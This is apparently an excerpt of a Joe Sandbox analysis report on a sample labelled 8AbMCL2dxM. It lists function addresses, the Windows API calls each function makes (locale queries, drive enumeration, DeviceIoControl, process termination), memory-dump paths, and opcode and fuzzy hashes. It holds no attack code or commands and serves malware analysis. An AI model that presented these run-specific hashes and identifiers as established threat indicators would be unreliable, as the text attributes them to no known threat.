                                        • Part of subcall function 00974B79: GetLastError.KERNEL32(000000FF,00000000,00961C08,00000000,00000000,?,009620EE,00000000,00000000,008EC60F,?,000000FF), ref: 00974B7D
                                        • Part of subcall function 00974B79: _free.LIBCMT ref: 00974BB0
                                        • Part of subcall function 00974B79: SetLastError.KERNEL32(00000000,00000000,008EC60F,?,000000FF), ref: 00974BF1
                                        • Part of subcall function 00974B79: _abort.LIBCMT ref: 00974BF7
                                        • Part of subcall function 00974B79: _free.LIBCMT ref: 00974BD8
                                        • Part of subcall function 00974B79: SetLastError.KERNEL32(00000000,00000000,008EC60F,?,000000FF), ref: 00974BE5
                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0097F149
                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0097F19A
                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0097F25A
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ErrorInfoLastLocale$_free$_abort
                                      • String ID:
                                      • API String ID: 2829624132-0
                                      • Opcode ID: c1404ef8f5e1be54234e5b8e8f08a9a516ce1ca29a563e3465969106848160e2
                                      • Instruction ID: 54ead198a0fb49fe67784ca3a6c76c13f2ac413323ada1582e8ba4e61cd404bc
                                      • Opcode Fuzzy Hash: c1404ef8f5e1be54234e5b8e8f08a9a516ce1ca29a563e3465969106848160e2
                                      • Instruction Fuzzy Hash: FF61B176A04207DBDF289F28DCA2BBA77A8FF44350F10C07AE919E6582E735D941DB50
                                      Function 0093D060 Relevance: 4.6, APIs: 3, Instructions: 80fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNEL32(0093D47E,00000008,00000007,00000000,00000003,02200000,00000000,BA3649C5,?,00000000,?,0093D47E,?), ref: 0093D0A3
                                      • DeviceIoControl.KERNEL32(00000000,000900A8,00000000,00000000,00000000,00004000,?,00000000), ref: 0093D0EA
                                      • CloseHandle.KERNEL32(00000000), ref: 0093D124
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: CloseControlCreateDeviceFileHandle
                                      • String ID:
                                      • API String ID: 33631002-0
                                      • Opcode ID: 3654cfb7dd5519099fa1d25ac8c237d0258b8173bbd278165760fbcffd1c4164
                                      • Instruction ID: 6ac151daacf19dabecb6640a1553ee7186fcf98fadf1220c35fcc5c5d89c3c4c
                                      • Opcode Fuzzy Hash: 3654cfb7dd5519099fa1d25ac8c237d0258b8173bbd278165760fbcffd1c4164
                                      • Instruction Fuzzy Hash: 18212971B89304ABEB34CF68EC56F9A77ACEB41B20F204125F915A72C0D7789A04DE95
                                      Function 00961689 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(?,?,0096165F,?,009CCA70,0000000C,009617B6,?,00000002,00000000), ref: 009616AA
                                      • TerminateProcess.KERNEL32(00000000,?,0096165F,?,009CCA70,0000000C,009617B6,?,00000002,00000000), ref: 009616B1
                                      • ExitProcess.KERNEL32 ref: 009616C3
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Process$CurrentExitTerminate
                                      • String ID:
                                      • API String ID: 1703294689-0
                                      • Opcode ID: c1f7a392380a2d36e9107b119543be54a5c94f94222176790f37f93307a437a9
                                      • Instruction ID: 8df6c667fc6c40b902146e49479110d9b9feb95e33a1f721731cb6e6ed4052e3
                                      • Opcode Fuzzy Hash: c1f7a392380a2d36e9107b119543be54a5c94f94222176790f37f93307a437a9
                                      • Instruction Fuzzy Hash: 37E0EC35018648AFCF11AF58DE09A593F69FF51786F088515F8198B171CB36DE92EB80
                                      Function 0097C26B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: .
                                      • API String ID: 0-248832578
                                      • Opcode ID: 0d01b2a683c62ea5137e598745e04f2ff46ca0b1f421afae59d2fc35dcf5e3d8
                                      • Instruction ID: 6f6e15e11b5c418931809563219e5ffc187a265ff7101aaee620570901aecb9d
                                      • Opcode Fuzzy Hash: 0d01b2a683c62ea5137e598745e04f2ff46ca0b1f421afae59d2fc35dcf5e3d8
                                      • Instruction Fuzzy Hash: 8C3104B2900209ABDB249E78CC84EFB7BBDDB86314F0481ACF91D97252E630DE448B50
                                      Function 0093C838 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • ___crtGetLocaleInfoEx.LIBCPMT ref: 0093C853
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: InfoLocale___crt
                                      • String ID: 2
                                      • API String ID: 3761071962-450215437
                                      • Opcode ID: 21050308334b799fa4845e2136b5bc43e20b657af9be352a7d1b082d41de5f94
                                      • Instruction ID: db7f352cd4b62b0ea3f83be5eb7d8fc8ebd6be5919040b0bce2eaba7fb005f75
                                      • Opcode Fuzzy Hash: 21050308334b799fa4845e2136b5bc43e20b657af9be352a7d1b082d41de5f94
                                      • Instruction Fuzzy Hash: CCE06595D55608BAEB04DB949986BEDB27CDB0038CF105155E10166081E2F58F94E761
                                      Function 0096A4E0 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9adf7bb1bc6867ead2e3adf638ada161e0e3409bbacd38574687c1eeb0b6b090
                                      • Instruction ID: eaac2f2bcb1ddf01942177e2c1d8ebe39244ec34611144f30f180dc7830405d2
                                      • Opcode Fuzzy Hash: 9adf7bb1bc6867ead2e3adf638ada161e0e3409bbacd38574687c1eeb0b6b090
                                      • Instruction Fuzzy Hash: 7A021B71E002199FDF14CFA9C9806ADBBF5EF88324F25826AD919F7240D731AE418F95
                                      Function 008EE290 Relevance: 2.5, APIs: 2, Instructions: 46memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0093FC80: GetProcessHeap.KERNEL32(00000000,?,?,BA3649C5,0098EB50,000000FF,?,008B528A,BA3649C5,76226230), ref: 0093FCCB
                                        • Part of subcall function 0093FC80: HeapFree.KERNEL32(00000000,?,?,BA3649C5,0098EB50,000000FF,?,008B528A,BA3649C5,76226230), ref: 0093FCD2
                                      • GetProcessHeap.KERNEL32(00000000,?,?,?,?,00985DF0,000000FF), ref: 008EE2E3
                                      • HeapFree.KERNEL32(00000000,?,?,?,?,00985DF0,000000FF), ref: 008EE2EA
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Heap$FreeProcess
                                      • String ID:
                                      • API String ID: 3859560861-0
                                      • Opcode ID: e4a0ae0b66f3d6e968efd21010506a54a9f4e0e1b4cdb9df5ec10b64bae79d7d
                                      • Instruction ID: f3d68ec87788345b2b7700cc945e5ccfa6d0178982f29fac6c715c976f8e2ed8
                                      • Opcode Fuzzy Hash: e4a0ae0b66f3d6e968efd21010506a54a9f4e0e1b4cdb9df5ec10b64bae79d7d
                                      • Instruction Fuzzy Hash: 4F01A232A49654ABC7209F99CC05F5ABBA8FB86B21F14022AFA15D73D0DB755900CBD0
                                      Function 0097237D Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00972378,?,?,00000008,?,?,00983411,00000000), ref: 009725AA
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ExceptionRaise
                                      • String ID:
                                      • API String ID: 3997070919-0
                                      • Opcode ID: 5238f5c722b1f4ad262c7bc3a188cc6bd06eb64082ada5e0ffd4d17d764145c3
                                      • Instruction ID: b12a04b17d5459b40d6cd7dce60bff4b73e24cbbb1a2f17833449c76c344e10c
                                      • Opcode Fuzzy Hash: 5238f5c722b1f4ad262c7bc3a188cc6bd06eb64082ada5e0ffd4d17d764145c3
                                      • Instruction Fuzzy Hash: A0B12932620609DFD719CF28C48AB657BE0FF45364F25C659E899CF2A1C339E981CB40
                                      Function 008CE2E0 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 72eb7d8a01c4825f5165ac9211cf0f8e702bbfad8f93838d11c8c8ff61b11a40
                                      • Instruction ID: 846061555b9792925f8dfcbdc9e5ad51ae8222453220fd33ce6fc5231ba0b4b8
                                      • Opcode Fuzzy Hash: 72eb7d8a01c4825f5165ac9211cf0f8e702bbfad8f93838d11c8c8ff61b11a40
                                      • Instruction Fuzzy Hash: 3851C471E146488BCB18EF68DD85BADB7B5FB94300F548269F805DB391DB31A941CB90
                                      Function 008CE140 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLogicalDriveStringsA.KERNEL32(00000104,00000000), ref: 008CE1DC
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: DriveLogicalStrings
                                      • String ID:
                                      • API String ID: 2022863570-0
                                      • Opcode ID: 65a6581d554f7ce4207540a3920f13a23ebf1b4762de35749ba1ae4cd9d19e3d
                                      • Instruction ID: cdc2c00bd338647e2709ba92b370f8f8e3bbc5a13205a5152d981035ad7e960d
                                      • Opcode Fuzzy Hash: 65a6581d554f7ce4207540a3920f13a23ebf1b4762de35749ba1ae4cd9d19e3d
                                      • Instruction Fuzzy Hash: B5410070D0024A9FDB10CFA8C845BAEFBB5FF45314F24426EE405AB381DB75AA44CBA1
                                      Function 0097F345 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00974B79: GetLastError.KERNEL32(000000FF,00000000,00961C08,00000000,00000000,?,009620EE,00000000,00000000,008EC60F,?,000000FF), ref: 00974B7D
                                        • Part of subcall function 00974B79: _free.LIBCMT ref: 00974BB0
                                        • Part of subcall function 00974B79: SetLastError.KERNEL32(00000000,00000000,008EC60F,?,000000FF), ref: 00974BF1
                                        • Part of subcall function 00974B79: _abort.LIBCMT ref: 00974BF7
                                        • Part of subcall function 00974B79: _free.LIBCMT ref: 00974BD8
                                        • Part of subcall function 00974B79: SetLastError.KERNEL32(00000000,00000000,008EC60F,?,000000FF), ref: 00974BE5
                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0097F399
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_free$InfoLocale_abort
                                      • String ID:
                                      • API String ID: 1663032902-0
                                      • Opcode ID: 98321d0f1822652fecb1251561191b71b3a3e9b4d1918f586b456cd1f78badc8
                                      • Instruction ID: c7423c5ba622bb4656676550c47a13c097c62ffa0d59b9b6fee0aa19a2dd8de0
                                      • Opcode Fuzzy Hash: 98321d0f1822652fecb1251561191b71b3a3e9b4d1918f586b456cd1f78badc8
                                      • Instruction Fuzzy Hash: A721B333914206ABDB249E28DC55BBA73ACEF41310F1080BAFD09E6191EB75ED41CB50
                                      Function 0097EFCD Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00974B79: GetLastError.KERNEL32(000000FF,00000000,00961C08,00000000,00000000,?,009620EE,00000000,00000000,008EC60F,?,000000FF), ref: 00974B7D
                                        • Part of subcall function 00974B79: _free.LIBCMT ref: 00974BB0
                                        • Part of subcall function 00974B79: SetLastError.KERNEL32(00000000,00000000,008EC60F,?,000000FF), ref: 00974BF1
                                        • Part of subcall function 00974B79: _abort.LIBCMT ref: 00974BF7
                                      • EnumSystemLocalesW.KERNEL32(0097F0F5,00000001,00000000,?,00971475,?,0097F722,00000000,?,?,?), ref: 0097F03F
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                      • String ID:
                                      • API String ID: 1084509184-0
                                      • Opcode ID: 3e88c07f76df3ee1092c49b2fcc340d2822cfb6763e733713c0b54baae9ccfbb
                                      • Instruction ID: ba3fda3688af145adce4407be8553a84117a634930a796d1cc0da9c9178fa419
                                      • Opcode Fuzzy Hash: 3e88c07f76df3ee1092c49b2fcc340d2822cfb6763e733713c0b54baae9ccfbb
                                      • Instruction Fuzzy Hash: 0F114C372047019FDB289F39C8A56BABB91FF84358B14843DE54B97B41D371B942C740
                                      Function 0097F575 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00974B79: GetLastError.KERNEL32(000000FF,00000000,00961C08,00000000,00000000,?,009620EE,00000000,00000000,008EC60F,?,000000FF), ref: 00974B7D
                                        • Part of subcall function 00974B79: _free.LIBCMT ref: 00974BB0
                                        • Part of subcall function 00974B79: SetLastError.KERNEL32(00000000,00000000,008EC60F,?,000000FF), ref: 00974BF1
                                        • Part of subcall function 00974B79: _abort.LIBCMT ref: 00974BF7
                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0097F313,00000000,00000000,?), ref: 0097F5A1
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ErrorLast$InfoLocale_abort_free
                                      • String ID:
                                      • API String ID: 2692324296-0
                                      • Opcode ID: a3b35a5353228136fd73bbfeef9285df9154a0de0133d034b3dc0564f8d2dc5d
                                      • Instruction ID: 3a63cceeb9f4f4990b41c3aed2765a16cf30273d848aee4b9c984762e135d183
                                      • Opcode Fuzzy Hash: a3b35a5353228136fd73bbfeef9285df9154a0de0133d034b3dc0564f8d2dc5d
                                      • Instruction Fuzzy Hash: 49F0D633510116AFDB245E64C8567BA7B68EB80354F04843AFC0DB3140EA35FE51C6D0
                                      Function 0097F068 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00974B79: GetLastError.KERNEL32(000000FF,00000000,00961C08,00000000,00000000,?,009620EE,00000000,00000000,008EC60F,?,000000FF), ref: 00974B7D
                                        • Part of subcall function 00974B79: _free.LIBCMT ref: 00974BB0
                                        • Part of subcall function 00974B79: SetLastError.KERNEL32(00000000,00000000,008EC60F,?,000000FF), ref: 00974BF1
                                        • Part of subcall function 00974B79: _abort.LIBCMT ref: 00974BF7
                                      • EnumSystemLocalesW.KERNEL32(0097F345,00000001,?,?,00971475,?,0097F6E6,00971475,?,?,?,?,?,00971475,?,?), ref: 0097F0B4
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                      • String ID:
                                      • API String ID: 1084509184-0
                                      • Opcode ID: 4cc65719aea690f0558935b6e751ddd2ce4540211cf3263f75956ec83bb8c1e6
                                      • Instruction ID: cf8193c2d3a5593da3859735e09c6dc52be82356a8623879e59c5396edf66e7d
                                      • Opcode Fuzzy Hash: 4cc65719aea690f0558935b6e751ddd2ce4540211cf3263f75956ec83bb8c1e6
                                      • Instruction Fuzzy Hash: ECF0C2373043055FDB249F399CA1A7A7B95EF80368B05843EF9099B691D6B19C41C640
                                      Function 00973430 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0096CA1B: EnterCriticalSection.KERNEL32(?,?,0096D846,00000000,009CCD40,0000000C,0096D801,?,?,?,0097553B,?,?,00974C2E,00000001,00000364), ref: 0096CA2A
                                      • EnumSystemLocalesW.KERNEL32(009733EA,00000001,009CCE40,0000000C), ref: 00973468
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                      • String ID:
                                      • API String ID: 1272433827-0
                                      • Opcode ID: 3137efc3c182f101efda9352a9031d423712e61254aabd6443010c5044d167be
                                      • Instruction ID: eb51a9520c9aa2c82a5843269b836f8897653c349bb8ad2907afaf14379ff62b
                                      • Opcode Fuzzy Hash: 3137efc3c182f101efda9352a9031d423712e61254aabd6443010c5044d167be
                                      • Instruction Fuzzy Hash: E6F06272A64300EFD710EF68E846F9D37F1EB85720F108116F414DB2A1DB744A44AF51
